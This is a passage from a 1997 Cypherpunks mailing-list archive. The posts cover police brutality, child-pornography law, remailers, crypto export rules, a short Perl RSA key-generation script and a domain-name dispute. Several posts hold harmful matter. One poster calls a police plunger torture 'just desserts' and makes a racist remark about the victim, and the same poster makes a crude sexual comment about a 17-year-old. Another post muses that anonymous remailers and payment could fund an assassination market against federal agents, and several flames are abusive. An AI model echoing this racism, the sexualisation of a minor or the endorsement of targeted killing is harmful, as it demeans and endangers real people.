Damned police state if I > ever saw one. > > As for stopping crime, they ain't doing shit. They're picking on small > things like parking tix and such, but as for going after mobsters and drug > dealers, the piggies are snarfing donuts. All I've ever see them do is > ticket cars and tow them away. > Can you blame them? They have a quote for writing parking tickets and will get in trouble for not writing enough; while they don't have a quota e.g. for writing tickets to the folks who run red lights, and can get shot at if they try to. As for the regrettable incident with the plunger: while it sounds bad out of context, it can be viewed as just desserts for the indignities the while people in New York City have undergone under the Dinkins administration. If the alleged victim (who already gave 3 highly contradictory stories of the events) thinks that this city is so racist, why didn't he stay in his native Haiti? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Thu Aug 14 16:35:17 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 15 Aug 1997 07:35:17 +0800 Subject: lynch child pornographers not bits! (was Re: Child Porn and Etern In-Reply-To: <199708141639.RAA03883@server.test.net> Message-ID: Adam Back writes: > Child pornographers and pedophiles operate in the real world, and they > get caught. Problem is they let them go again despite 80+% re-offense > rate. Hence cry for "lynch them". There was some sicko in this town > who molested a 7 year old girl over a 2 year time span. Turned > himself in, and got 1 year jail time. He's out an about cocky as > ever, not even repentant. Back in the days of the wild-west such > types wouldn't live long. "He needed killing" used to be I understand > a perfectly satisfactory legal defense. Conspiracy theory: given how people who have anything to do with (some) drugs get locke dup for life, do the law enforcement agencies purposefully let the child molesters run wild to scare the public into supporting more curtailment of civil liberties? > > btw "Child pornographer" is a difficult term to define towards the > boundary, eg Tracy Lords was underage at the begining of here career, > also the age of consent is much lower in the liberal Scandinavian > countries. Last time we had this argument James Donald posted to the > list a uuencoded gif of some chick, I guess the claim was she was just > underage by US standards. I understand that in Canada the age of concent is 14, which is pretty reasonable. It turns out that Tracy Lords was 17 at the time she was filmed sucking cock. A girl who hasn't had a cock in her mouth by the time she's 17 is probably a lesbian. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dformosa at st.nepean.uws.edu.au Thu Aug 14 16:47:32 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Fri, 15 Aug 1997 07:47:32 +0800 Subject: Hypothetical situation for networks In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 14 Aug 1997, Ray Arachelian wrote: > On Wed, 13 Aug 1997, Mike Jones wrote: > > > OS doesn't really matter, as it is a hypothetical system, but we'll assume > > either some form of unix/linux, or perhaps winNT or novell NetWare. > > Can NFS under solaris or linux be tunneled through SSH? That would seem > feasable (that is if you can get SSH to tunnel a UDP...) If thay are useing NFS over a lan I would hope thay are useing the TCP verson. While UDP is fine on a Lan you realy need the (reletive) reliblity that comes with TCP. In fact if you want any reliblity you sould by your own line. The Internet is just two unrealible. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM/NbTaQK0ynCmdStAQG0mwQAw2d5J8pyAz93CVRjoN8c+FziznMSKmMW CCHKmLhOSHlqosem4Uas9kXZhMuqKG2ZZ8GZ/aXZL1zUtF9mX+jDxmBx3ohUEaDD u3OIJ84DSKEA3AQjsKp03FUo1j5/0unsbnPjks2iYRuO157FaFC5YYkx1gxqfbiI hyTKm7gLDts= =Nq6K -----END PGP SIGNATURE----- From jrennie at hardy.ocs.mq.edu.au Thu Aug 14 17:35:37 1997 From: jrennie at hardy.ocs.mq.edu.au (Jason William RENNIE) Date: Fri, 15 Aug 1997 08:35:37 +0800 Subject: Text of Clinton's remarks on child safety locks for handguns In-Reply-To: Message-ID: > This week, Smith and Wesson -- the world's largest manufacturer > of handguns -- announced that it is forging a partnership with the > Master Lock Company to provide a child safety lock with every handgun > sold for commercial use. I applaud both of these companies for their > efforts to promote gun safety. Well this bit sound reasonable enough. > accidental gunshot wounds. That is why my anti-gang and youth > violence legislation would require that all federally licensed gun > dealers provide such safety devices with every handgun sold. And Ahh ... ha the truth comes forth. The question i have is, what is Clintons anti-gang legislation ?? Given i'm in oz and dont follow US news much ?? So can anyubody shed some light on this ?? Jason From wombat at mcfeely.bsfs.org Thu Aug 14 17:50:35 1997 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 15 Aug 1997 08:50:35 +0800 Subject: Not enough phone competition? Answer: regulate more! In-Reply-To: Message-ID: One of the main issues is the claim by INX carriers that the RBOCs are uncooperative in providing customer data in electronic format, as required. -r.w. On Thu, 14 Aug 1997, Declan McCullagh wrote: > By JEANNINE AVERSA

> Associated Press Writer

> WASHINGTON (AP) - Just 18 months after Congress deregulated the > communications industry, the nation's top telephone regulator asked > lawmakers Thursday for more tools to bring Americans local phone > competition. > "So far, scarcely any local competition has been delivered to > residential or business consumers," Federal Communications Commission > Chairman Reed Hundt said in a speech to the American Enterprise Institute. > "We have a major challenge to introduce competition in the local > telephone markets and that challenge is not yet being met," he said. > Hundt asked Congress to write into law provisions: > -Giving the FCC authority to set national pricing rules for those > seeking access to local phone networks. > -Requiring courts to defer to reasonable FCC judgments in disputes > over the telecommunications law. > -Consolidating appeals over the telecommunications law and FCC > rules before a single unspecified court. > -Creating a national policy to enforce the telecommunications law, > giving the FCC power to compensate injured parties. The FCC now can order > violators to stop breaking the law and fine offenders. > Congressional hearings into the slow pace of local phone > competition are slated for this fall. > Sen. John McCain, R-Ariz., chairman of the Commerce Committee that > oversees telecommunications policy, said when asked about the proposals, > "I do not think that giving the FCC more authority to regulate is the > answer." > [...] > > > From jya at pipeline.com Thu Aug 14 18:20:50 1997 From: jya at pipeline.com (John Young) Date: Fri, 15 Aug 1997 09:20:50 +0800 Subject: CIA/NSA Index Redux Message-ID: <1.5.4.32.19970815004937.00690fc0@pop.pipeline.com> Excuse the crummy links, they worked when we were hooked to the source but, it seems, not after disconnect. We have not downloaded all the linked files, so here's the routine to get them: Log onto: http://www.access.gpo.gov/su_docs/aces/aaces002.html Highlight: "Privacy Act Issuances 1995 Compilation" Enter: "cia" (with quotes) in the search slot, jack number of records up to "100" and submit 83 records will be listed, and the links will work, just now confirmed it. Repeat for "nsa" or any other federal agency. Search also for "crypto*" (note * ) to see the cryptologic citations, which brings up a number of cites from CIA, NSA and others. From azur at netcom.com Thu Aug 14 19:42:30 1997 From: azur at netcom.com (Steve Schear) Date: Fri, 15 Aug 1997 10:42:30 +0800 Subject: "Morphed" child porn case ruling text (FSC v. Reno) In-Reply-To: Message-ID: I fail to see the First Amendment basis differences between rulings supporting the ban on child pornography and rulings upholding the dessemination of bomb making. In the case of child porn the laws maintain that the mere presence of such materials can serve as a catalyst to pervs who might use the materials to self-stimulate into a frezy leading to a rape or entice young'ins to voluntarily engage in proscribed activities. Healthy functioning adults, however, should be able to safely view such materials, and if they have an academic (though not necessarily affilaited with an institution for higher education) interest use them to understand the motivations and psychology of the pervs. In the case of bomb or weapons of mass destruction information, pyrotechnics or terrorists might use them to build devices to kill or injure many citizens (e.g., McVeigh), yet these materials are consititutionally protected. This is, to my mind, an obvious double standard with no rational explanation other than interpretation of the consitution to match prevailing public sentement. I suggest taht jurists who cannot rationally an dispassionately rule on such matters be immediately removed from office. --Steve From anon at anon.efga.org Thu Aug 14 20:30:55 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 15 Aug 1997 11:30:55 +0800 Subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Confesses)) Message-ID: At 04:13 PM 8/14/97 -0400, Dr. Dimitri Vulis wrote: >If you don't like remailers, FUCK YOU. Somebody please put that on a bumper sticker! From enoch at zipcon.net Thu Aug 14 22:55:06 1997 From: enoch at zipcon.net (Mike Duvos) Date: Fri, 15 Aug 1997 13:55:06 +0800 Subject: "Morphed" child porn case ruling text (FSC v. Reno) In-Reply-To: Message-ID: <19970815054023.27975.qmail@zipcon.net> Steve Writes: > I suggest taht jurists who cannot rationally > an dispassionately rule on such matters be immediately removed from office. It strikes me that when material is ruled to be too dangerous to be allowed in the community, it must be based on how the material affects the typical well-adjusted citizen. The so-called "reasonable person" test. We certainly can't go around banning everything that might send some kook off on a tangent or crusade, and goodness knows, were such a standard to be adopted, the Bible would be the first thing on the bonfire. So it would seem that the court is saying one of two things. Either that the average American citizen has so much psychological baggage concerning sex and children, that he or she experiences uncontrolled arousal upon being exposed to it, and leaps off to find children to show the material to and perform sex acts on. Or that American citizens collectively have so much psychological baggage concerning sex and children, that they through their elective representatives have chosen to make sexual depictions of children the sole exception to Constitutional guarantees of freedom of expression. Either way, it is hardly a stirring testimony to the mental health of the nation. While I suspect the typical citizen is unlikely to have a particularly strong reaction one way or the other to sexual depictions of children, as long as it is not a photographic record of an actual child being treated abusively, there is a obvious subset of frothy pointy-headed individuals who should be shielded from such material at all costs, or they may be completely unable to control their behavior. They are of course the self-appointed "child protectors", none of whom could care less about what rights children really need or want, as long as no one appears naked. -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From geeman at best.com Thu Aug 14 23:13:02 1997 From: geeman at best.com (geeman at best.com) Date: Fri, 15 Aug 1997 14:13:02 +0800 Subject: Microsoft and Java Message-ID: <3.0.32.19691231160000.006e5ad0@best.com> At 01:15 AM 8/15/97 +0200, you wrote: > >::Boots > >------------ > > > http://www.computerworld.com/news/970730javah.html > >The Paul Maritz interview that article links to has disappeared from >Computerworld's site, but a copy is appended. > >=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > CW: Is there some reason you wouldn't want to ship them? Is there > something inferior about them? > > Maritz: No. We don't want to put further bloat on top of the system. This obviously has to make everone on the planet bust a gut howling with laughter! > We think that basically there isn't a lot of end-user value in them. > And Sun's trying to establish them as basically their platform. It's > a competing operating system. > From enoch at zipcon.net Thu Aug 14 23:13:27 1997 From: enoch at zipcon.net (Mike Duvos) Date: Fri, 15 Aug 1997 14:13:27 +0800 Subject: Toilet plungers and sodomy: Why we should trust police blindly In-Reply-To: <031FBe4w165w@bwalk.dm.com> Message-ID: <19970815055619.28758.qmail@zipcon.net> Dr. Vebis writes: > As for the regrettable incident with the plunger: while it sounds bad out of > context, it can be viewed as just desserts for the indignities the while people > in New York City have undergone under the Dinkins administration. If the > alleged victim (who already gave 3 highly contradictory stories of the events) > thinks that this city is so racist, why didn't he stay in his native Haiti? WHAT!? The "alleged victim" describes officers beating him and then shoving a toilet plunger up his rectum and down his throat while yelling "Take that, Nigger!" He has a broken jaw, a punctured rectum, and a torn bladder, a colostomy, and will require multiple surgeries to repair all the damage. The police officers initially covered up for eachother, and the guilty cop was only turned over to internal affairs when the cops realized that they had a situation so serious that they couldn't lie their way out of it. It will be interesting to see whether he is charged with anything serious, what sort of defense he concocts, whether his fellow officers testify against him. In other news, a Texas jury refused to indict a marine who shot an 18 year old goatherder tending his flock near the Mexican border. After the shooting, the marines claimed that the man had fired first, but this excuse seems to be crumbling as the investigation continues. An interesting newsday, as Tim McVeigh is sentenced to death, and quotes from Justice Brandeis about the government teaching its citizen-units by example. Ruby Ridge, Waco, Jackbooted Thugs, Atrocities under Color of Authority, Unbridled Arrogance, and Unmitigated Gall. Surely we should learn well from these examples as our government tells us how it wishes us to treat it. Up against the wall with the lot of them. -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From whgiii at amaranth.com Thu Aug 14 23:40:36 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Fri, 15 Aug 1997 14:40:36 +0800 Subject: Microsoft and Java In-Reply-To: <3.0.32.19691231160000.006e5ad0@best.com> Message-ID: <199708150616.BAA09255@mailhub.amaranth.com> X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.31a b31 From whgiii at amaranth.com Fri Aug 15 00:00:29 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Fri, 15 Aug 1997 15:00:29 +0800 Subject: "Morphed" child porn case ruling text (FSC v. Reno) In-Reply-To: Message-ID: <199708150636.BAA09415@mailhub.amaranth.com> X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.31a b31 From tcmay at got.net Fri Aug 15 00:32:37 1997 From: tcmay at got.net (Tim May) Date: Fri, 15 Aug 1997 15:32:37 +0800 Subject: Cartel Leaders Set Snipers To Work In Border War Message-ID: <199708150714.AAA08918@you.got.net> According to this article, the home addresses of government agents are being solicited by Mexican drug dealers, for disposal of agents interfering in their business. Between anonymous remailers and payment systems, a real Assassination Politics market could be set up. Don't even need untraceable e-cash, though this would be better. Glad I'm not a DEA or INS agent. --Tim May > Date: Thu, 14 Aug 1997 22:42:08 -0700 (PDT) > Message-ID: <199708150542.WAA25283 at sirius.infonex.com> > From: Mix > Comments: This message did not originate from the address above. It was remailed by an anonymous remailing service. If you have questions or complaints, please direct them to > Subject: Cartel Leaders Set Snipers To Work In Border War > Newsgroups: talk.politics.guns,misc.legal,misc.survivalism,alt.news-media,alt.politics.usa.misc,alt.politics.media,alt.politics.clinton > Mail-To-News-Contact: postmaster at nym.alias.net > Organization: mail2news at nym.alias.net > Lines: 58 ... > Cartel leaders set snipers to work in border 'war' > By John Hiscock Electronic Telegraph, London > > August 11, 1997 > > AMERICAN Border Patrol agents have become targets of snipers working > for drug smugglers trying to take control of the border with Mexico. A > five-mile strip of frontier near San Diego in California has become so > dangerous that a specially-trained squad of border patrol sentries > armed with assault rifles has been drafted in to combat the snipers, > who have fired at agents seven times in the past two months. > > The agents believe that Mexican drug cartel leaders have issued > instructions to kill any law enforcement officers impeding drug > smuggling operations. Their fears have been heightened by a bulletin > from the Immigration and Naturalisation Service that said two drug > cartel leaders in the Mexican border city of Tijuana had "reportedly > contracted with local gangs on both sides of the border to kill > federal law enforcement personnel", preferably on American soil. In > addition, officers recently received reports that cartel henchmen have > put a price on their heads by offering to pay £7,000 for the > home address of any United States federal agent. > > Dianne Feinstein, a Californian senator, says that border patrol > agents, whose job until recently was to arrest mainly frightened and > unarmed Mexicans trying to cross the frontier at night, are now in the > front line of a vicious drug war. "This is a border on alert, a border > where anything could happen," she said. "These cartels are moving > drugs across the border and are operating with impunity and that adds > an increased risk to the lives of border patrol agents. This is a > different border than it was two years ago." > > In addition to being the most popular spot for illegal aliens > attempting to cross, the border around San Diego is now the main > gateway for cocaine and heroin bound for the US. Since the > introduction of Operation Gatekeeper, President Clinton's 1994 > anti-illegal alien initiative that poured more money and agents into > the San Diego area, the drug smugglers have found themselves > increasingly caught up in the patrols' swoops on illegal > border-crossers. > > "We've made it increasingly difficult for drug traffic," said John > Williams, the chief of San Diego's 2,000-strong border patrol sector. > "We're making it tough on crime and that certainly has some bearing on > their reaction. The escalation of violence is of grave concern to me > and my agents." > > Members of the elite special protection unit carry M-16 assault > rifles, with a range of more than a mile, while all agents are now > being issued with semi-automatic pistols and shotguns. -- There's something wrong when I'm a felon under an increasing number of laws. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From eon at black.hole Fri Aug 15 16:00:15 1997 From: eon at black.hole (eon) Date: Fri, 15 Aug 1997 16:00:15 -0700 (PDT) Subject: AGAIN???DISINFO IN THE NY TIMES??? RESPOND!!! Message-ID: <1340453579-6908029@MediaFilter.org> Again the NY Times is blatantly misleading the public! The following letter was sent to Jeri Clausing, a NY Times reporter bringing the disinformative article to her attention. Please read her article and then send her a "reminder" of her accountability to the public. Journalism requires thourough research and not just reliance on the press releases from NSI's IAHC's, of DoC's pr agencies. Wheather it's just pure laziness or wheather Ms. Clausing is following an agenda of some sort, it still adds up to dishonest and disinformative reporting. You can email to Jeri Clausing at jeri at nytimes.com. While you're at it, please cc it to her boss: cybertim at nytimes.com, rofixm at nytimes.com ----------full text of message follows--------- To: jeri at nytimes.com From: pgp at pgmedia.net (pgMedia) Subject: Disinfo In the NY Times---again? Cc: cybertim at nytimes.com, rofixm at nytimes.com Message-ID: <1340460904-6466563 at MediaFilter.org> X-UIDL: 2ad5cdbc00a0fb68ba0a56b3fd2d9ae5 Dear Jeri Clausing, In your August 15 article in Cybertimes entitled "Public Jumps into the Domain Name Dispute" you failed to mention some key facts which are factors in the current Domain Name issue. First, the petition being widely endorsed in support of pgMedia, Inc.'s NAME.SPACE service, was not mentioned in your article, although it represents a significant percentage of the number of total replies received to date by the US Department of Commerce. The petition is located at http://petition.name.space.xs2.net Second, you failed to report the fact that pgMedia, Inc. is currently engaged in litigation against Network Solutions, Inc., a significant and influencing factor in this whole discussion. (http://name.space.xs2.net/law) These blatant omissions are patently misleading to the public and fail to give a fair overview of the entire situation. Wheather you are underinformed on this issue, or wheather you consciously choose to abridge the facts to suit your personal agenda or that of your employer, the New York Times, you are doing a disservice to the public by exercising such journalistic irresponsibility. I had higher expectations for those who write for the NY Times, and this opportunity to see how news is shaped and manufactured has been highly enlightening. Had I not been involved deeply and first-hand in this issue and had there not been so much reported about my comapny in the media, including the NY Times, concerning pgMedia/Name.Space's role in the changing domain name space, the Anti Trust Litigation against Network Solutions, and the US Department of Justice's involvement, I would have also been disinformed by your reporting. If you have any interest in informing yourself fully on the details absent in your reporting, please feel free to contact me at 212.677.4080. I will be happy to meet with you and demonstrate the name.space service and answer any qusetions you may have...and I'll forgive you if you really were unaware! Best regards, Paul Garrin president pgMedia, Inc./NAME.SPACE http://name.space http://name.space.xs2.net From patrick at atro.pine.nl Fri Aug 15 01:11:37 1997 From: patrick at atro.pine.nl (Patrick Oonk) Date: Fri, 15 Aug 1997 16:11:37 +0800 Subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Confesses)) In-Reply-To: <9E157oQnntYqhiv6vHV2+w==@JawJaCrakR> Message-ID: <199708150758.JAA16675@atro.pine.nl> > > > The remailer hating Nazi called Patrick Oonk wrote: > >At least I don't hide behind a remailer. > > There's no cowardice to it, dumbass. Our founding fathers and others wrote things anonymously. I guess they're cowards? > > If so, then burn in hell, Nazi scum-sucking weasel! I wrote two remailer programs, I ran several remailers, and I am working on bugfixes for replay. I couldn't care less about your founding fathers who killed the native americans and raped their women. Killing virtually unarmed people with guns is an act of cowardice. Flaming me through a remailer is the equivalent of shouting 'hey asshole!' and then running away. Children do it often. I also cannot reply to you privately, so all other members of this mailinglist have to suffer our private flamewar. hugs and kisses, Patrick -- | Patrick Oonk - http://patrick.mypage.org/ - patrick at pine.nl | | PGP Key ID 0xDA2E93FA - Internic PO59 - | | Pine Internet B.V. Consultancy, installatie en beheer | | Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ | From nobody at REPLAY.COM Fri Aug 15 01:36:49 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Aug 1997 16:36:49 +0800 Subject: Sign up on YoungSluts click thru Program Message-ID: <199708150820.KAA22896@basement.replay.com> Ray Arachelian wrote: > would you guys quit giving cypherpunks at toad.com as your email address for > your porno runs. The extra spam is annoying. :) use nobody at nowhere.mil > if you want... :) > > On Wed, 13 Aug 1997, YoungGirl wrote: > > >Below is the result of your feedback form. It was submitted by > > > (cypherpunks at toad.com) on Wednesday, August 13, 1997 at 19:46:18 Use your Mr. C. Punks credit card to sign up, and send the password to the list. Be assured that I, for one, only use the XXX-rated accounts for valid Stegonongraphy research. YoungSlutMonger From stewarts at ix.netcom.com Fri Aug 15 02:24:15 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Aug 1997 17:24:15 +0800 Subject: Export rules In-Reply-To: Message-ID: <3.0.2.32.19970815020530.02fe7290@popd.ix.netcom.com> At 05:35 AM 8/14/97 +0000, Vipul Ved Prakash wrote: >> Already been done. RSA in 4 lines of Perl, etc... Heck there was even a >> site out that that cut a UUENCODED copy of PGP into many bits and asked > >Is RSA in 3 lines of PERL an ITAR violation? Its more like "meta" code for bc >todo RSA. adam? Well, Raph Levien applied for an export permit for the RSA-in-4-lines-of-PERL shirt several years ago, and the export thugs stalled on it and never responded positively or negatively, in spite of their publicly stated policies that they "will" respond in some small number of days. Since then, they've changed the laws, and the PERL RSA has gotten shorter... Of course, it's not a violation for Adam - he's not an American :-) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From stewarts at ix.netcom.com Fri Aug 15 02:37:57 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Aug 1997 17:37:57 +0800 Subject: PGP in < 100 lines of perl In-Reply-To: Message-ID: <3.0.2.32.19970815021912.02ff4d54@popd.ix.netcom.com> At 08:30 AM 8/14/97 +0100, Adam Back wrote: >I once started trying to implement full PGP functionality in as few >lines of perl/dc as possible. > >I got pgp signature verification working. >and PGP compatible IDEA PRZ style CFB mode in 9 lines. >and PGP key lookup in 7 lines. >and MD5 in 8 lines. > >(Several of those were other peoples contributions) > >If you used /dev/random for random numbers plus a bit more glue, it >would've worked. Everything put compression and key generation. If you want to skip PGP file format compatibility, and type the occasional key in in hex, it should be even shorter; the ideal is to fit in about 60 lines for faxing on one page :-) Steve Reid did an RSA key generation program that, in squashed form, looks like this (there's an expanded version with comments.) It depends on the user entering a lot of random junk, but that's what your N monkeys and keyboards are for. #!/usr/local/bin/perl $k=768;$e=sprintf'%X',65537;print"Please enter a LOT of random junk.\n" ;$a=;print"Working. This may take a while.\n";for(1..(length($a)- 1)){$b[$_&31]^=unpack('C',substr($a,$_,1));$b[$_&31]=(($b[$_&31]<<5)|($b [$_&31]>>3))&255;}for(0..255){$c[$_]=$_;}$a=$d=$f=0;for(0..255){$a=($a+ $c[$_]+$b[$a&31])&255;($c[$_],$c[$a])=($c[$a],$c[$_]);}open(F,'|dc'); select F;print"16dio[$e+]sa";for(1..50){for(1..$k/32){printf'%02X',&g;} print"Sr";}for(1,2){printf'%02X',&g|128;for(2..$k/16){printf'%02X',&g;} print"d$e%-2+d2%0=aSP";}print"[d2%SA2/d0C]sC[LsSrld1-dsd0QQ]sE_1selExsq_1seLPlExsp[p=]Plpp[q=]Plqp[n=]P*p[e=]P$e p1-lp 1-lq1-**1+$e/[d=]Pp\n";close(F);sub g{$d=($d+1)&255;$f=($f+$c[$d])&255;( $c[$d],$c[$f])=($c[$f],$c[$d]);return($c[($c[$d]+$c[$f])&255]);} # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From stewarts at ix.netcom.com Fri Aug 15 03:22:00 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Aug 1997 18:22:00 +0800 Subject: Another Free Email Site with remailer possibilities Message-ID: <3.0.2.32.19970815030611.02ff46e8@popd.ix.netcom.com> Www.Iname.com is yet another free email site. Its business model is to offer free email forwarding from basic accounts (paid for by advertising attached to the bottom of the mail), with fancier-looking accounts and POP mailboxes for extra money. They have very explicit anti-spam policies, but I'm not sure if they really hunt down spammers, or if they just respond to complaints by shutting off accounts and keeping the $0 or $15. The policies would be no problem for a subscription-only exit remailer, presumably no problem for a entry-only or middleman remailer, and appear to ban non-subscription-based exit remailers. They may or may not have a problem with the type of remailer that sends a non-registered user a note saying "You've got anonymous mail; send this cookie if you want to receive it"; my guess is they probably drop free accounts after one complaint. The free accounts look like username at iname.com, or a few other lame domain names like cyberdude.com; one of them is "earthling.net", and I suspect the spammer who sent me mail from one of those accounts was trying to pretend to be from earthlink.net ; I've probably blocked both of them by now. You can only have one free account per destination address. The advertising attached to the bottom of the mail messages shouldn't be a problem for PGP-only remailers, assuming they use some tolerable format and don't try to package your mail in some MIME or HTML wrappers. I can't tell, because they say they won't start attaching ads until the extra-price-option ad-remover software is available RSN. The non-free accounts cost $15/year (first 60 days free) for wider collection of domain names (including mail.com, which is usable, and some pure spam-bait names including seductive.com and credit4u.com.) POP3 mailboxes cost $24/year. Their security is really spotty - they use SSL for things related to your bill, but not for passwords, at least for free accounts.... It's easy to set up an account that forwards mail to some third party; if you want to control the thing, you have to point it to yourself first, have it send you the password and confirmation, then go log in to the member page and change your mail forwarding destination. So it's unfortunately easy to spam the innocent with an account at innocent.com (they don't have guilty.com, though :-) I've set up remailer1 at disposable.com to point to winsock at rigel.cyberpass.net , which is a PGP-only remailer. It'll expire in 60 days, unless someone wants to spend money, but that's why it's remailer1 at disposable.com.... It's got one of the usual passwords. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From info at pgmedia.net Fri Aug 15 18:34:10 1997 From: info at pgmedia.net (pgMedia) Date: Fri, 15 Aug 1997 18:34:10 -0700 (PDT) Subject: AGAIN???DISINFO IN THE NY TIMES??? RESPOND!!! Message-ID: <1340444993-7425307@MediaFilter.org> Again the NY Times is blatantly misleading the public! The following letter was sent to Jeri Clausing, a NY Times reporter bringing the disinformative article to her attention. Please read her article and then send her a "reminder" of her accountability to the public. Journalism requires thourough research and not just reliance on the press releases from NSI's IAHC's, of DoC's pr agencies. Wheather it's just pure laziness or wheather Ms. Clausing is following an agenda of some sort, it still adds up to dishonest and disinformative reporting. You can email to Jeri Clausing at jeri at nytimes.com. While you're at it, please cc it to her boss: cybertim at nytimes.com, rofixm at nytimes.com ----------full text of message follows--------- To: jeri at nytimes.com From: pgp at pgmedia.net (pgMedia) Subject: Disinfo In the NY Times---again? Cc: cybertim at nytimes.com, rofixm at nytimes.com Message-ID: <1340460904-6466563 at MediaFilter.org> X-UIDL: 2ad5cdbc00a0fb68ba0a56b3fd2d9ae5 Dear Jeri Clausing, In your August 15 article in Cybertimes entitled "Public Jumps into the Domain Name Dispute" you failed to mention some key facts which are factors in the current Domain Name issue. First, the petition being widely endorsed in support of pgMedia, Inc.'s NAME.SPACE service, was not mentioned in your article, although it represents a significant percentage of the number of total replies received to date by the US Department of Commerce. The petition is located at http://petition.name.space.xs2.net Second, you failed to report the fact that pgMedia, Inc. is currently engaged in litigation against Network Solutions, Inc., a significant and influencing factor in this whole discussion. (http://name.space.xs2.net/law) These blatant omissions are patently misleading to the public and fail to give a fair overview of the entire situation. Wheather you are underinformed on this issue, or wheather you consciously choose to abridge the facts to suit your personal agenda or that of your employer, the New York Times, you are doing a disservice to the public by exercising such journalistic irresponsibility. I had higher expectations for those who write for the NY Times, and this opportunity to see how news is shaped and manufactured has been highly enlightening. Had I not been involved deeply and first-hand in this issue and had there not been so much reported about my comapny in the media, including the NY Times, concerning pgMedia/Name.Space's role in the changing domain name space, the Anti Trust Litigation against Network Solutions, and the US Department of Justice's involvement, I would have also been disinformed by your reporting. If you have any interest in informing yourself fully on the details absent in your reporting, please feel free to contact me at 212.677.4080. I will be happy to meet with you and demonstrate the name.space service and answer any qusetions you may have...and I'll forgive you if you really were unaware! Best regards, Paul Garrin president pgMedia, Inc./NAME.SPACE http://name.space http://name.space.xs2.net From stewarts at ix.netcom.com Fri Aug 15 03:52:55 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Aug 1997 18:52:55 +0800 Subject: Encrypting same data with many keys... In-Reply-To: Message-ID: <3.0.2.32.19970815034224.0305a2f0@popd.ix.netcom.com> At 05:01 PM 8/14/97 -0400, nospam-seesignature at ceddec.com wrote: >On Wed, 13 Aug 1997, Ray Arachelian wrote: >> Would it not be more secure if it picked a different IDEA session key for >> each recipient? Would be slower, but... > >If there were random padding, I don't think it would increase the >security. PGP uses one conventional key and multiple PK encryptions of >it, with different padding (I think). Then you only have one message to >send out, i.e. pk1,pk2...pkn,convenc instead of pk1,cenc1 pk2,cenc2... There's really no need - the threat is in the RSA part, which is that you can solve for the secret message if you've got one secret message encrypted with a bunch of known public keys. By using different random padding on the IDEA session key for each public-key used, you avoid that problem. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From nobody at REPLAY.COM Fri Aug 15 04:08:29 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Aug 1997 19:08:29 +0800 Subject: Toilet plungers and sodomy: Why we should trust police blindly Message-ID: <199708151054.MAA08032@basement.replay.com> Mike Duvos wrote: > The "alleged victim" describes officers beating him and then shoving a > toilet plunger up his rectum and down his throat while yelling "Take that, > Nigger!" He has a broken jaw, a punctured rectum, and a torn bladder, a > colostomy, and will require multiple surgeries to repair all the damage. > In other news, a Texas jury refused to indict a marine who shot an 18 year > old goatherder tending his flock near the Mexican border. > An interesting newsday, as Tim McVeigh is sentenced to death, and quotes > from Justice Brandeis about the government teaching its citizen-units by > example. I expect to receive an email from "News of the Weird" any day now, announcing that they are going out of business because they can no longer compete with the "normal" weird news that is becoming standard fare in the main press. What bothers me is that there seems to be an amazing number of people who have developed the ability to watch the unceasing parade of freedom-fucking, fascist insanity that marches across their field of vision each day, and manage to block it from their consciousness by telling themself that everything is going to be OK, as soon as we get a few more laws to rid the planet of drug-dealing pedophiles. I would like to see Janet Reno and Louis Freeh announce a press conference and tell the citizens, "...and the minute we have all of the drug-dealing pedophiles in prison, we're going to see if we can't do something about those cops that are shoving toilet plungers up the 